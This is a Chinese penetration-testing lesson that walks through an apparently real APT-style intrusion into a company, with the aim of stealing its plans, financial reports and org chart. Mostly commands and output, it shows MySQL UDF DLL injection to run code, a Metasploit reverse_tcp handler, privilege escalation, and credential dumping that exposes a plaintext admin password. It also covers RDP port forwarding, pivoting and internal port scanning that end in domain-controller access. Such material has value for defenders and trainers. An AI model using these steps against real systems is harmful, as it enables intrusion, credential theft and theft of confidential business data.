模拟诉求任务攻击

模拟任务:

拿到该公司明年计划,拿到该公司今年报表,并且摸清该公司组织架构。盈利情况。

1、主站 Shell

第一个shell为目标主站shell,为08 R2,提权后遂改变主意。由于是以APT为主,并不打算以主站权限为点渗透,动作太大。不利于长期跟踪。改变为搜集情报为主。配合下一步工作。

第八课:模拟诉求任务攻击 - 图1

主站为2008 R2:

第八课:模拟诉求任务攻击 - 图2

主站端口为:

第八课:模拟诉求任务攻击 - 图3

2、信息搜集

搜集端口为该公司的其他分站提供下一步探测。

  • 进程搜集:红色为重点搜集源
  1. > D:\> tasklist
  2. 映像名稱 PID 工作階段名稱 工作階段 # RAM使用量
  3. ========================= ======== ================ =========== ============
  4. System Idle Process 0 0 24 K
  5. System 4 0 372 K
  6. smss.exe 296 0 1,448 K
  7. csrss.exe 400 0 6,968 K
  8. wininit.exe 452 0 5,636 K
  9. csrss.exe 460 1 12,460 K
  10. winlogon.exe 496 1 6,484 K
  11. services.exe 556 0 10,392 K
  12. lsass.exe 572 0 22,076 K
  13. lsm.exe 584 0 7,104 K
  14. svchost.exe 676 0 10,840 K
  15. svchost.exe 760 0 9,492 K
  16. LogonUI.exe 852 1 19,632 K
  17. svchost.exe 864 0 21,188 K
  18. svchost.exe 904 0 34,904 K
  19. svchost.exe 944 0 13,476 K
  20. svchost.exe 996 0 13,512 K
  21. svchost.exe 168 0 19,480 K
  22. svchost.exe 648 0 12,348 K
  23. spoolsv.exe 1080 0 16,672 K
  24. armsvc.exe 1124 0 4,208 K
  25. apnmcp.exe 1172 0 5,832 K
  26. svchost.exe 1196 0 9,228 K
  27. aspnet_state.exe 1224 0 8,264 K
  28. FileZilla Server.exe 1344 0 7,876 K
  29. svchost.exe 1380 0 10,408 K
  30. inetinfo.exe 1412 0 31,680 K
  31. EngineServer.exe 1448 0 568 K
  32. FrameworkService.exe 1548 0 19,580 K
  33. VsTskMgr.exe 1612 0 1,724 K
  34. MDM.EXE 1680 0 6,652 K
  35. naPrdMgr.exe 1692 0 2,116 K
  36. mfevtps.exe 1720 0 992 K
  37. sqlservr.exe 1760 0 13,284 K
  38. svchost.exe 1844 0 3,452 K
  39. snmp.exe 1868 0 9,264 K
  40. sqlwriter.exe 1904 0 7,440 K
  41. vmtoolsd.exe 1976 0 17,012 K
  42. snmp.exe 1988 0 3,164 K
  43. conhost.exe 1996 0 4,784 K
  44. vmware-converter-a.exe 2068 0 31,460 K
  45. vmware-converter.exe 2180 0 38,176 K
  46. vmware-converter.exe 2228 0 32,828 K
  47. svchost.exe 2288 0 14,152 K
  48. McShield.exe 2320 0 89,332 K
  49. mfeann.exe 2468 0 5,860 K
  50. conhost.exe 2476 0 3,380 K
  51. w3wp.exe 2592 0 160,760 K
  52. w3wp.exe 2812 0 463,872 K
  53. svchost.exe 3452 0 9,656 K
  54. svchost.exe 4104 0 6,384 K
  55. dllhost.exe 4252 0 12,192 K
  56. msdtc.exe 4424 0 8,708 K
  57. svchost.exe 4196 0 34,760 K
  58. w3wp.exe 5604 0 12,632 K
  59. TrustedInstaller.exe 4500 0 11,788 K
  60. cmd.exe 6292 0 3,932 K
  61. conhost.exe 6384 0 4,476 K
  62. tasklist.exe 1496 0 6,064 K
  63. WmiPrvSE.exe 5508 0 7,272 K
  • 账户搜集:(已处理)
    第八课:模拟诉求任务攻击 - 图4

  • 重要路径搜集:
    (无图,路径搜集为未来可能需要dump file做准备)

  • 数据库密码搜集:
    (无图,密码搜集为未来可能需要碰撞做准备)

  • 杀毒软件搜集: 强力的麦咖啡

  • 管理员习惯搜集:
    (无图,尽量避免与admin的fvsf)(面对面的vs是不是这么拼写?)

  • 其他搜集:
    (由于是第一个shell,具体的已经忘记了)

3、第二台服务器权限

第二台服务器权限:window x86 2003

根据上一台的服务器情报搜集很快得到了一台win03
第八课:模拟诉求任务攻击 - 图5
第八课:模拟诉求任务攻击 - 图6

  • IP .3
    第八课:模拟诉求任务攻击 - 图7

为一台开发机。目标仅支持 asp,无其他脚本支持。但是服务器中安装有 mysql,php 等。并且无 asp to mysql Device Drive IIS 配置中也并不支持 php。msf 反弹后,继续搜集情报。

  1. type C:\MySQL\MySQL Server 5.0\data\mysql\user.MYD

得到 root hash

在实际情况中,交互的shell下运行 mysql -uroot -pxxx 无法继续交互,需要参数 e 解决这个问题。

  1. mysql -uroot -pxxxxxxxx mysql -e "create table a (cmd LONGBLOB);"
  2. mysql -uroot -pxxxxxxxx mysql -e "insert into a (cmd) values (hex(load_file('C:\\xxxx\\xxxx.dll')));"
  3. mysql -uroot -pxxxxxxxx mysql -e "SELECT unhex(cmd) FROM a INTO DUMPFILE
  4. 'c:\\windows\\system32\\xxxx.dll';"
  5. mysql -uroot -pxxxxxxxx mysql -e "CREATE FUNCTION shell RETURNS STRING SONAME 'udf.dll'"
  6. mysql -uroot -pxxxxxxxx mysql -e "select shell('cmd','C:\\xxxx\\xxx\\xxxxx.exe');"

第八课:模拟诉求任务攻击 - 图8

如果限制上传大小同样可以hex解决上传大小问题。

4、msf 操作实例

以下为部分msf操作实例

  1. msf > use exploit/multi/handler
  2. msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
  3. msf exploit(handler) > exploit -l
  4. meterpreter > ps
  5. Process List
  6. ============
  7. PID PPID Name Arch Session User Path
  8. --- ---- ---- ---- ------- ---- ----
  9. 0 0 [System Process]
  10. 4 0 System x86 0 NT AUTHORITY\SYSTEM
  11. 304 4 smss.exe x86 0 NT AUTHORITY\SYSTEM\SystemRoot\System32\smss.exe
  12. 352 304 csrss.exe x86 0 NT AUTHORITY\SYSTEM \?? \C:\WINDOWS\system32\csrss.exe
  13. 376 304 winlogon.exe x86 0 NT AUTHORITY\SYSTEM \?? \C:\WINDOWS\system32\winlogon.exe
  14. 424 376 services.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\services.exe
  15. 436 376 lsass.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\lsass.exe
  16. 620 424 vmacthlp.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\VMware\VMware Tools\vmacthlp.exe
  17. 636 424 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\svchost.exe
  18. 708 424 svchost.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\svchost.exe
  19. 768 424 svchost.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\svchost.exe
  20. 812 424 svchost.exe x86 0 NT AUTHORITY\LOCAL SERVICE C:\WINDOWS\system32\svchost.exe
  21. 828 424 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe
  22. 1000 424 spoolsv.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\spoolsv.exe
  23. 1028 424 msdtc.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\msdtc.exe
  24. 1160 424 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe
  25. 1228 424 inetinfo.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\inetsrv\inetinfo.exe
  26. 1252 424 sqlservr.exe x86 0 NT AUTHORITY\SYSTEM C:\PROGRA\~1\MICROS~1\MSSQL\binn\sqlservr.exe
  27. 1304 424 mysqld.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\MySQL\MySQL Server 5.1\bin\mysqld.exe
  28. 1348 424 svchost.exe x86 0 NT AUTHORITY\LOCAL SERVICE C:\WINDOWS\system32\svchost.exe
  29. 1408 424 vmtoolsd.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
  30. 1472 424 mssearch.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\Common Files\System\MSSearch\Bin\mssearch.exe
  31. 1720 424 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe
  32. 2128 2084 explorer.exe x86 0 xxxxxxxxxxxx\Administrator C:\WINDOWS\Explorer.EXE
  33. 2208 2128 vmtoolsd.exe x86 0 xxxxxxxxxxxx\Administrator C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
  34. 2232 2128 ctfmon.exe x86 0 xxxxxxxxxxxx\Administrator C:\WINDOWS\system32\ctfmon.exe
  35. 2244 2128 sqlmangr.exe x86 0 xxxxxxxxxxxx\Administrator C:\Program Files\Microsoft SQL Server\80\Tools\Binn\sqlmangr.exe
  36. 2396 424 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe
  37. 2440 424 dllhost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\dllhost.exe
  38. 3008 2128 cmd.exe x86 0 xxxxxxxxxxxx\Administrator C:\WINDOWS\system32\cmd.exe
  39. 3024 3008 conime.exe x86 0 xxxxxxxxxxxx\Administrator C:\WINDOWS\system32\conime.exe
  40. 3180 636 wmiprvse.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\wbem\wmiprvse.exe
  41. 3248 828 wuauclt.exe xxxxxxxxxxxx\Administrator C:\WINDOWS\system32\wuauclt.exe
  42. 3380 376 logon.scr x86 0 xxxxxxxxxxxx\Administrator C:\WINDOWS\System32\logon.scr
  1. meterpreter > migrate 2128
  2. [*] Migrating from 3104 to 2128...
  3. [*] Migration completed successfully. meterpreter > getsystem
  4. ...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
  5. meterpreter > getuid
  6. Server username: NT AUTHORITY\SYSTEM meterpreter > msv
  7. [+] Running as SYSTEM
  8. [*] Retrieving msv credentials msv credentials
  9. ===============
  10. AuthID Package Domain User Password
  11. ------ ------- ------ ---- --------
  12. 0;109205 NTLM xxxxxxxxxxxx Administrator lm{ xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx}, ntlm{xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx }
  13. 0;996 Negotiate NT AUTHORITY NETWORK SERVICE lm{xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx }, ntlm{xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx }
  14. 0;997 Negotiate NT AUTHORITY LOCAL SERVICE n.s. (Credentials KO)
  15. 0;54469 NTLM n.s. (Credentials KO)
  16. 0;999 NTLM WORKGROUP xxxxxxxxxxxx\$ n.s. (Credentials KO)
  1. meterpreter > kerberos [+] Running as SYSTEM
  2. [*] Retrieving kerberos credentials kerberos credentials
  3. ====================
  4. AuthID Package Domain User Password
  5. ------ ------- ------ ---- --------
  6. 0;996 Negotiate NT AUTHORITY NETWORK SERVICE
  7. 0;997 Negotiate NT AUTHORITY LOCAL SERVICE
  8. 0;54469 NTLM
  9. 0;999 NTLM WORKGROUP xxxxxxxxxxxx$
  10. 0;109205 NTLM xxxxxxxxxxxx Administrator 123456
  11. meterpreter > portfwd add -l 3389 -r x.x.x.x -p 3389 #IP已做处理
  12. [*] Local TCP relay created: :3389 <-> x.x.x.x:3389
  13. meterpreter > portfwd
  14. Active Port Forwards
  15. ====================
  16. Index Local Remote Direction
  17. ----- ----- ------ ---------
  18. 1 0.0.0.0:3389 x.x.x.x:3389 Forward
  19. 1 total active port forwards.
  20. root@xxxx:/# rdesktop 127.0.0.1:3389 Autoselected keyboard map en-us
  21. Failed to negotiate protocol, retrying with plain RDP.
  22. WARNING: Remote desktop does not support colour depth 24; falling back to 16
  23. meterpreter > run autoroute -h
  24. [*] Usage: run autoroute [-r] -s subnet -n netmask
  25. [*] Examples:
  26. [*] run autoroute -s 10.1.1.0 -n 255.255.255.0 # Add a route to
  27. 10.10.10.1/255.255.255.0
  28. [*] run autoroute -s 10.10.10.1 # Netmask defaults to 255.255.255.0
  29. [*] run autoroute -s 10.10.10.1/24 # CIDR notation is also okay
  30. [*] run autoroute -p # Print active routing table
  31. [*] run autoroute -d -s 10.10.10.1 # Deletes the 10.10.10.1/255.255.255.0 route
  32. [*] Use the "route" and "ipconfig" Meterpreter commands to learn about available routes
  33. [-] Deprecation warning: This script has been replaced by the post/windows/manage/autoroute module
  34. meterpreter > ifconfig
  35. Interface 1
  36. ============
  37. Name : MS TCP Loopback interface
  38. Hardware MAC : 00:00:00:00:00:00
  39. MTU : 1520
  40. IPv4 Address : 127.0.0.1
  41. Interface 2
  42. ============
  43. Name : Broadcom NetXtreme Gigabit Ethernet - McAfee NDIS Intermediate Filter Miniport
  44. Hardware MAC : 00:11:25:40:77:8f
  45. MTU : 1500
  46. IPv4 Address : 10.23.255.3 IPv4 Netmask : 255.255.255.0
  47. meterpreter > run autoroute -s 10.23.255.3 -n 255.255.255.0
  48. [*] Adding a route to 10.23.255.3/255.255.255.0...
  49. [+] Added route to 10.23.255.3/255.255.255.0 via 61.57.243.227
  50. [*] Use the -p option to list all active routes
  51. meterpreter > run autoroute -p
  52. Active Routing Table
  53. ====================
  54. Subnet Netmask Gateway
  55. ------ ------- -------
  56. 10.23.255.3 255.255.255.0 Session 3
  57. meterpreter > ifconfig
  58. Interface 1
  59. ============
  60. Name : MS TCP Loopback interface
  61. Hardware MAC : 00:00:00:00:00:00
  62. MTU : 1520
  63. IPv4 Address : 127.0.0.1
  64. Interface 2
  65. ============
  66. Name : Broadcom NetXtreme Gigabit Ethernet - McAfee NDIS Intermediate Filter Miniport
  67. Hardware MAC : 00:11:25:40:77:8f
  68. MTU : 1500
  69. IPv4 Address : 10.23.255.3 IPv4 Netmask : 255.255.255.0
  70. meterpreter >
  71. Background session 3? [y/N]
  72. msf auxiliary(tcp) > use auxiliary/scanner/portscan/tcp
  73. msf auxiliary(tcp) > show options
  74. Module options (auxiliary/scanner/portscan/tcp):
  75. Name Current Setting Required Description
  76. ---- --------------- -------- -----------
  77. CONCURRENCY 10 yes The number of concurrent ports to check per host
  78. DELAY 0 yes The delay between connections, per thread, in milliseconds
  79. JITTER 0 yes The delay jitter factor (maximum value by which to +/- DELAY) in milliseconds.
  80. PORTS 445,80,3389,22 yes Ports to scan (e.g. 22-25,80,110-900)
  81. RHOSTS 10.23.255.1-255 yes The target address range or CIDR identifier
  82. THREADS 10 yes The number of concurrent threads
  83. TIMEOUT 1000 yes The socket connect timeout in milliseconds

最终得到了域控权限,并且得到了跨段的服务器权限。得到了个人机的重要权限,以及公司财报doc。

部分截图如下:由于时间问题,顺序可能打乱了。
第八课:模拟诉求任务攻击 - 图9

第八课:模拟诉求任务攻击 - 图10

第八课:模拟诉求任务攻击 - 图11

第八课:模拟诉求任务攻击 - 图12

跳段, 个人机
第八课:模拟诉求任务攻击 - 图13

第八课:模拟诉求任务攻击 - 图14

放弃权限,所有操作并未更改,下载,删除等一切损害该公司的行为。
第八课:模拟诉求任务攻击 - 图15

至此由虚拟机跳段到了工作办公机,(典型的A-B-C类跳板)得到了该公司的下年计划,人员组织构架,财务报表,盈利情况,以及内部相关work文档等。

—By Micropoor